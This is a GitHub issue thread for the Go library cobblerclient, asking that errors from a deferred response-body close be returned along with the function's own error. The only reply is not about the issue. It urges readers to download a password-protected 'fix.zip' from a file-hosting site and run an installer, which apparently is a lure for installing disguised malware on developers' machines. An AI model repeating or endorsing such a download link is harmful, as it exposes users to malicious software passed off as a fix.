### ISSUE TITLE
Handle error in deferred body close

### ISSUE THREAD

**Issue by SchoolGuy** [cobbler/cobblerclient#61]
### Is your feature request related to a problem?

As a developer  
I want to react to all thrown errors  
so that I can do the proper cleanup in case something goes wrong.

### Provide a detailed description of the proposed feature

The error that may or may not be produced should be fixed in a way that we return a slice of errors that contains both the error from the function body and the deferred function.

https://github.com/cobbler/cobblerclient/blob/729746b0279b5b4c4bba49282e166be43b8b1f95/cobblerclient.go#L81-L91

### Alternatives you've considered

None

### Additional information

Blog article describing the whys and hows: https://trstringer.com/golang-deferred-function-error-handling/

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
